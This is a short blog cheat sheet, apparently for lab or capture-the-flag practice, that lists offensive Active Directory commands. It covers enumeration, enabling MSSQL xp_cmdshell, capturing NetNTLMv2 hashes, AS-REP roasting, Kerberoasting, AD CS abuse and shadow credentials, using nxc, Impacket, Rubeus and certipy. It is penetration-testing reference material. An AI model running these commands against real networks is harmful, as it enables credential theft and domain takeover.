Post

CheatSheet - Active Directory Attacks

Posted Updated
By Nasrallah Baadi 1 min read

User Enumeration

1
2

nxc smb 10.10.10.10 -u user -p password --users
nxc smb 10.10.10.10 -u user -p password --rid-brute

1

rpcclient $> enumdomusers

SMB

Smb authentication.

1

nxc smb 10.10.10.10 -u user -p password

List shares

1

nxc smb 10.10.10.10 -u user -p password --shares -M spider_plus

1

smbclient -L 10.10.10.10 -U user -N

LDAP

Anonymous login

1

ldapsearch -H 'ldap://htb.local/' -x -b "dc=htb,dc=local" '(objectClass=person)'

Creds

1

ldapsearch -x -H ldap://cicada.htb -D user@cicada.htb -w 'password' -b "DC=cicada,DC=htb"

MSSQL

XP_DIRTREE

List a directory with xp_dirtree.

1

exec master.sys.xp_dirtree 'c:\', 1, 1;

Get NetNTMLv2 hash

1

xp_dirtree \\10.10.10.10\share

Command execution

Check admin privileges: 1=true=admin.

1

SELECT is_srvrolemember('sysadmin');

Enable xp_cmdshell manually.

1
2
3
4

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Impacket auto-enable.

1

enable_xp_cmdshell

Executing commands.

1

xp_cmdshell "whoami"

1

nxc mssql manager.htb -u operator -p operator -x whoami

1

nxc mssql domain.local -u user -p pass -q 'SELECT name FROM master.dbo.sysdatabases;'

Attacking Kerberos

AS-Rep Roasting

1

nxc ldap 10.10.10.161 -u '' -p ''  --asreproast hashes.txt

1

GetNPUsers.py 'htb.local/' -usersfile users.txt -no-pass -dc-ip 10.10.10.161

1

rubeus.exe asreproast /format:hashcat /nowrap

Kerberoasting

1

GetUserSPNs.py -request -dc-ip 10.10.10.10 'DOMAIN/user:password' -outputfile hashes.txt

1

nxc ldap 10.10.10.10. -u user -p password --kerberoasting hashes.txt

1

rubeus.exe kerberoast /nowrap

Pass The Ticket

Generating TGTs

1

getTGT.py 'domain.local/user' -dc-ip 10.10.11.45 -p 'password'

1

nxc smb domain -u user -p password --generate-tgt user

AD CS

AD CS - Privilege-Escalation

1

certipy find -vulnerable -u user -p password -dc-ip 10.10.11.72 -stdout

1

certify.exe find /vulnerable

1

nxc ldap 10.10.10.10 -u user -p pass -M adcs

Shadow Credentials

Windows

1

Whisker.exe add /target:sflowers /password:siriussirius /path:cert.pfx

1

Rubeus.exe asktgt /user:sflowers /certificate:cert.pfx /password:"siriussirius" /domain:domain.local /dc:DC.domain.local /getcredentials /show

Linux

1

certipy shadow auto -account {target_user} -u 'user@domain.local' -p 'password' -dc-ip 10.129.135.59

1

bloodyAD --host domain.local -d domain.local -u user -p password add shadowCredentials {target_user}

Delegation

Constrained Delegation

Unconstrained Delegation

Resource Based Constrained Delegation

References

https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation

CheatSheet
CheatSheet windows
This post is licensed under CC BY 4.0 by the author.